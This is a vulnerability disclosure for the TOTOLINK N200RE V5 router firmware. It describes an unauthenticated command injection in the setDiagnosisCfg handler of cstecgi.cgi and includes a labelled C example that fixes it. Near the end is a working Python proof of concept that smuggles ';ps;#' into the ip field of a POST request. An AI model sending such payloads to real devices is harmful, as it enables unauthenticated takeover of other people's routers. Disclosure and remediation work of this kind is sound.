TOTOLINK N200RE V5 (V9.3.5u.6139_B20201216) router has a command injection vulnerability

Information

Vendor: http://totolink.net/

Firmware: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/204/ids/36.html

Affected Version

V9.3.5u.6139_B20201216

Vulnerability Analysis

The following image displays the code for a command injection vulnerability in the setDiagnosisCfg handler function of cstecgi.cgi. The value of the ip parameter is spliced into the ping %s -w ... command string and executed by the doSystem function, which allows an attacker to execute arbitrary commands. The vulnerability does not require authentication.

Vulnerability
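
One way to close the hole described above, as an added example that is not the vendor's firmware code or part of the original README: accept the ip value only if it parses as a literal IPv4/IPv6 address, and start ping with an argument vector so that no shell interprets the value. The names is_literal_ip and safe_ping and the ping options are assumptions.

```c
/* Added example (hypothetical names). Per the page, the ip value is formatted
 * into "ping %s -w ..." and run through doSystem, so a shell parses it. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return 1 only if s is a literal IPv4 or IPv6 address. inet_pton rejects
 * shell metacharacters, whitespace, option-like strings and trailing data. */
int is_literal_ip(const char *s)
{
    unsigned char buf[sizeof(struct in6_addr)];
    if (s == NULL || s[0] == '\0' || strlen(s) >= INET6_ADDRSTRLEN)
        return 0;
    return inet_pton(AF_INET, s, buf) == 1 || inet_pton(AF_INET6, s, buf) == 1;
}

/* Validate first, then exec ping directly with an argv array.
 * Returns ping's exit status, or -1 if the input is rejected or
 * the child could not be started or waited for. */
int safe_ping(const char *ip)
{
    if (!is_literal_ip(ip))
        return -1;              /* rejected before any process is created */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* ip is one argv element; "--" ends option parsing (assumed options) */
        execlp("ping", "ping", "-c", "1", "-w", "2", "--", ip, (char *)NULL);
        _exit(127);             /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(int argc, char **argv)
{
    const char *ip = argc > 1 ? argv[1] : ";ps;#";  /* default: the page's PoC value */
    printf("%s -> %d\n", ip, safe_ping(ip));
    return 0;
}
```
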

POC

import requests

url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"

payload = """{
    "topicurl": "setDiagnosisCfg",
    "num": "123",
    "ip": ";ps;#"
}"""

requests.request("POST", url, data=payload)

postman